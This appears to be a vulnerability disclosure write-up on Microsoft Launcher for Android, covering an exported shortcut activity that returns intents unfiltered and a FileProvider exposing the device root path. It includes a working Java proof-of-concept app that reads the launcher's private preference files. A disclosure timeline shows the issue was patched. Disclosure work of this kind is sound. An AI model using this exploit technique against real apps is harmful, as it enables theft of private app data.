Insecure content providers in com.microsoft.launcher
While conducting security research,and focusing on Android application userland bugs I uncovered a intresting vulnerability within the com.microsoft.launcher.allapps.AllAppsShortcutActivityactivity implementation on the com.microsoft.launcher aplication. Specifically, this vulnerability arises from the absence of input filtering in the onMAMCreate() function. Here is the relevant vulnerable code snippet:
1
2
3
4
5
6
7
8
9
10
11
public void onMAMCreate(Bundle bundle0) {
super.onMAMCreate(bundle0);
Intent intent0 = this.getIntent();
if(intent0 != null && intent0.getAction() != null && (intent0.getAction().equals("android.intent.action.CREATE_SHORTCUT"))) {
intent0.putExtra("android.intent.extra.shortcut.INTENT", new Intent(this.getApplicationContext(), AllAppsShortcutActivity.class));
intent0.putExtra("android.intent.extra.shortcut.NAME", this.getResources().getString(0x7F110225));
intent0.putExtra("android.intent.extra.shortcut.ICON", ViewUtils.f(this, new c(i.f().e)));
this.setResult(-1, intent0);
this.finish();
}
}
This activity is marked for export, making it accessible to third-party applications. Consequently, third-party apps can send an intent, which is subsequently processed and assigned to the intent0 variable via this.getIntent(). If the action within intent0 matches android.intent.action.CREATE_SHORTCUT, the execution proceeds to setResult(-1, intent0).
This situation presents a significant security vulnerability because it permits the insecure parsing of incoming intents via setResult(). This vulnerability creates an opportunity for malicious applications to exploit the exported activity by sending an intent. The intent is then processed within the context of the com.microsoft.launcher application, and the result is returned to the malicious application.
Another vulnerability was identified in the content providers XML of com.microsoft.launcher:
1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8"?>
<paths xmlns:android="http://schemas.android.com/apk/res/android">
<root-path name="root_path" path="."/>
<external-path name="external_storage_root" path="."/>
<external-files-path name="profile" path="."/>
<files-path name="note_root" path="./Arrow/Notes/"/>
<files-path name="data_files" path="data/"/>
</paths>
The issue is that the content-provider defined a root-path element as . which allows the ability to read any files from the root path of the mobile device.
POC Requirements.
- com.microsoft.launcher version 6.210502.0.963770 (963770)
- Device running
Android 9.
Proof of Concept
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
package com.example.microsofthunts;
import androidx.appcompat.app.AppCompatActivity;
import android.app.WallpaperInfo;
import android.content.Intent;
import android.database.Cursor;
import android.icu.util.Output;
import android.net.Uri;
import android.os.Bundle;
import android.os.Handler;
import android.provider.ContactsContract;
import android.util.Log;
import org.apache.commons.io.IOUtils;
import org.xmlpull.v1.XmlPullParserException;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Intent exploit = new Intent("android.intent.action.CREATE_SHORTCUT");
exploit.setClassName("com.microsoft.launcher", "com.microsoft.launcher.allapps.AllAppsShortcutActivity");
exploit.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
exploit.setData(Uri.parse("content://com.microsoft.launcher.provider/root_path/data/data/com.microsoft.launcher/shared_prefs/com.microsoft.launcher_RemoteConfiguration.xml"));
startActivityForResult(exploit, 1);
}
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
super.onActivityResult(requestCode, resultCode, data);
try {
Log.d("Dumping Files: ", IOUtils.toString(getContentResolver().openInputStream(data.getData())));
} catch (Throwable th) {
throw new RuntimeException(th);
}
}
public void dump(Uri uri) {
Cursor cursor = getContentResolver().query(uri, null, null, null, null);
if (cursor.moveToFirst()) {
do {
StringBuilder sb = new StringBuilder();
for (int i = 0; i < cursor.getColumnCount(); i++) {
if (sb.length() > 0) {
sb.append(", ");
}
sb.append(cursor.getColumnName(i) + " = " + cursor.getString(i));
}
Log.d("Rezk", sb.toString());
} while (cursor.moveToNext());
}
}
}
Disclosure Timeline
| Action | Date |
|---|---|
| Reported vulnerabilities to Microsoft and provided Proof of Concept (POC) | 2nd June, 2022 |
| Submitted an updated report with additional information | 4th June, 2022 |
| The report was moved into the Review/Repro stage | 6th June, 2022 |
| The report was moved into the Development stage | 19th June, 2022 |
| The case was updated, indicating low severity | 20th June 2022 |
| A patch was issued; however, the bounty was not paid or received due to the bug only being vulnerable on Android 9 but not 10/11 | 23th June 2022. |
| Full disclosure of the issue | 17th Oct 2023 |